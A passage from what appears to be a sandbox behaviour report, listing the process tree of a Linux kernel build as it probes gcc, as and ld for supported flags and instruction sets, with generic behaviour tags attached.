/bin/echo/bin/echo -e "1: .quad 1b"4⤵PID:1655
-
-
/usr/bin/objcopyobjcopy -O elf32-x86-64 /tmp/a/.tmp_1652/tmp /tmp/a/.tmp_1652/tmp.o4⤵
- Writes file to tmp directory
PID:1658
-
-
/usr/bin/ldld -m elf32_x86_64 /tmp/a/.tmp_1652/tmp.o -o /tmp/a/.tmp_1652/tmp4⤵PID:1654
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_16524⤵PID:1659
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -mfentry -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"y\"; else echo \"n\"; fi"3⤵PID:1660
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_16604⤵PID:1661
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -mfentry -c -x c /dev/null -o /tmp/a/.tmp_1660/tmp4⤵PID:1662
-
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1660/tmp -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -o /tmp/cct7EELQ.s5⤵PID:1663
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1660/tmp /tmp/cct7EELQ.s5⤵PID:1664
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1660/tmp /tmp/cct7EELQ.s5⤵PID:1664
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1660/tmp /tmp/cct7EELQ.s5⤵PID:1664
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1660/tmp /tmp/cct7EELQ.s5⤵PID:1664
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_16604⤵PID:1665
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( printf \"%b\\n\" \".cfi_startproc\\n.cfi_rel_offset rsp,0\\n.cfi_endproc\" | gcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o \"\$TMP\" -) >/dev/null 2>&1; then echo \"-DCONFIG_AS_CFI=1\"; else echo \"\"; fi"3⤵PID:1666
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_16664⤵
- Reads runtime system information
PID:1667
-
-
/usr/bin/gccgcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o /tmp/a/.tmp_1666/tmp -4⤵PID:1670
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1666/tmp -5⤵PID:1671
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1666/tmp -5⤵PID:1671
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1666/tmp -5⤵PID:1671
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1666/tmp -5⤵PID:1671
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_16664⤵PID:1672
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( printf \"%b\\n\" \".cfi_startproc\\n.cfi_signal_frame\\n.cfi_endproc\" | gcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o \"\$TMP\" -) >/dev/null 2>&1; then echo \"-DCONFIG_AS_CFI_SIGNAL_FRAME=1\"; else echo \"\"; fi"3⤵PID:1673
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_16734⤵PID:1674
-
-
/usr/bin/gccgcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o /tmp/a/.tmp_1673/tmp -4⤵PID:1677
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1673/tmp -5⤵PID:1678
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1673/tmp -5⤵PID:1678
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1673/tmp -5⤵PID:1678
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1673/tmp -5⤵PID:1678
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_16734⤵PID:1679
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( printf \"%b\\n\" \".cfi_sections .debug_frame\" | gcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o \"\$TMP\" -) >/dev/null 2>&1; then echo \"-DCONFIG_AS_CFI_SECTIONS=1\"; else echo \"\"; fi"3⤵PID:1680
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_16804⤵PID:1681
-
-
/usr/bin/gccgcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o /tmp/a/.tmp_1680/tmp -4⤵PID:1684
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1680/tmp -5⤵PID:1685
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1680/tmp -5⤵PID:1685
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1680/tmp -5⤵PID:1685
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1680/tmp -5⤵PID:1685
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_16804⤵PID:1686
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( printf \"%b\\n\" \"vxorps %ymm0,%ymm1,%ymm2\" | gcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o \"\$TMP\" -) >/dev/null 2>&1; then echo \"-DCONFIG_AS_AVX=1\"; else echo \"\"; fi"3⤵PID:1687
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_16874⤵PID:1688
-
-
/usr/bin/gccgcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o /tmp/a/.tmp_1687/tmp -4⤵PID:1691
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1687/tmp -5⤵PID:1692
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1687/tmp -5⤵PID:1692
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1687/tmp -5⤵PID:1692
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1687/tmp -5⤵PID:1692
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_16874⤵PID:1693
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( printf \"%b\\n\" \"vpbroadcastb %xmm0,%ymm1\" | gcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o \"\$TMP\" -) >/dev/null 2>&1; then echo \"-DCONFIG_AS_AVX2=1\"; else echo \"\"; fi"3⤵PID:1694
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_16944⤵PID:1695
-
-
/usr/bin/gccgcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o /tmp/a/.tmp_1694/tmp -4⤵PID:1698
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1694/tmp -5⤵PID:1699
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1694/tmp -5⤵PID:1699
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1694/tmp -5⤵PID:1699
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1694/tmp -5⤵PID:1699
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_16944⤵PID:1700
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( printf \"%b\\n\" \"vpmovm2b %k1,%zmm5\" | gcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o \"\$TMP\" -) >/dev/null 2>&1; then echo \"-DCONFIG_AS_AVX512=1\"; else echo \"\"; fi"3⤵PID:1701
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17014⤵
- Reads runtime system information
PID:1702
-
-
/usr/bin/gccgcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o /tmp/a/.tmp_1701/tmp -4⤵PID:1705
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1701/tmp -5⤵PID:1706
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1701/tmp -5⤵PID:1706
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1701/tmp -5⤵PID:1706
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1701/tmp -5⤵
- Writes file to tmp directory
PID:1706
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17014⤵PID:1707
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( printf \"%b\\n\" \"sha1msg1 %xmm0,%xmm1\" | gcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o \"\$TMP\" -) >/dev/null 2>&1; then echo \"-DCONFIG_AS_SHA1_NI=1\"; else echo \"\"; fi"3⤵PID:1708
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17084⤵PID:1709
-
-
/usr/bin/gccgcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o /tmp/a/.tmp_1708/tmp -4⤵PID:1712
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1708/tmp -5⤵PID:1713
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1708/tmp -5⤵PID:1713
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1708/tmp -5⤵PID:1713
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1708/tmp -5⤵PID:1713
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17084⤵PID:1714
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( printf \"%b\\n\" \"sha256msg1 %xmm0,%xmm1\" | gcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o \"\$TMP\" -) >/dev/null 2>&1; then echo \"-DCONFIG_AS_SHA256_NI=1\"; else echo \"\"; fi"3⤵PID:1715
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17154⤵
- Reads runtime system information
PID:1716
-
-
/usr/bin/gccgcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o /tmp/a/.tmp_1715/tmp -4⤵PID:1719
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1715/tmp -5⤵PID:1720
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1715/tmp -5⤵PID:1720
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1715/tmp -5⤵PID:1720
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1715/tmp -5⤵PID:1720
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17154⤵PID:1721
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( printf \"%b\\n\" \"pshufb %xmm0,%xmm0\" | gcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o \"\$TMP\" -) >/dev/null 2>&1; then echo \"-DCONFIG_AS_SSSE3=1\"; else echo \"\"; fi"3⤵PID:1722
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17224⤵
- Reads runtime system information
PID:1723
-
-
/usr/bin/gccgcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o /tmp/a/.tmp_1722/tmp -4⤵PID:1726
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1722/tmp -5⤵PID:1727
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1722/tmp -5⤵PID:1727
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1722/tmp -5⤵PID:1727
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1722/tmp -5⤵PID:1727
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17224⤵PID:1728
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( printf \"%b\\n\" \"pshufb %xmm0,%xmm0\" | gcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -c -x assembler -o \"\$TMP\" -) >/dev/null 2>&1; then echo \"-DCONFIG_AS_SSSE3=1\"; else echo \"\"; fi"3⤵PID:1729
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17294⤵
- Reads runtime system information
PID:1730
-
-
/usr/bin/gccgcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -c -x assembler -o /tmp/a/.tmp_1729/tmp -4⤵PID:1733
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1729/tmp -5⤵PID:1734
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1729/tmp -5⤵PID:1734
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1729/tmp -5⤵PID:1734
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1729/tmp -5⤵PID:1734
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17294⤵PID:1735
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( ld -m elf_x86_64 -z max-page-size=0x200000 -v) >/dev/null 2>&1; then echo \" -z max-page-size=0x200000\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1736 -
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17364⤵PID:1737
-
-
/usr/bin/ldld -m elf_x86_64 -z "max-page-size=0x200000" -v4⤵PID:1738
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17364⤵PID:1739
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fno-jump-tables\"; else echo \"\"; fi"3⤵PID:1740
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17404⤵PID:1741
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -c -x c /dev/null -o /tmp/a/.tmp_1740/tmp4⤵
- Writes file to tmp directory
PID:1742 -
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1740/tmp -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fstack-protector-strong -fstack-clash-protection -o /tmp/ccAAzK4W.s5⤵
- Writes file to tmp directory
PID:1743
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1740/tmp /tmp/ccAAzK4W.s5⤵PID:1744
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1740/tmp /tmp/ccAAzK4W.s5⤵PID:1744
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1740/tmp /tmp/ccAAzK4W.s5⤵PID:1744
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1740/tmp /tmp/ccAAzK4W.s5⤵
- Writes file to tmp directory
PID:1744
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17404⤵PID:1745
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fno-delete-null-pointer-checks\"; else echo \"\"; fi"3⤵PID:1746
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17464⤵PID:1747
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -c -x c /dev/null -o /tmp/a/.tmp_1746/tmp4⤵PID:1748
-
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1746/tmp -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fstack-clash-protection -o /tmp/ccBcBOwl.s5⤵
- Writes file to tmp directory
PID:1749
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1746/tmp /tmp/ccBcBOwl.s5⤵PID:1750
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1746/tmp /tmp/ccBcBOwl.s5⤵PID:1750
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1746/tmp /tmp/ccBcBOwl.s5⤵PID:1750
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1746/tmp /tmp/ccBcBOwl.s5⤵
- Writes file to tmp directory
PID:1750
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17464⤵PID:1751
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern 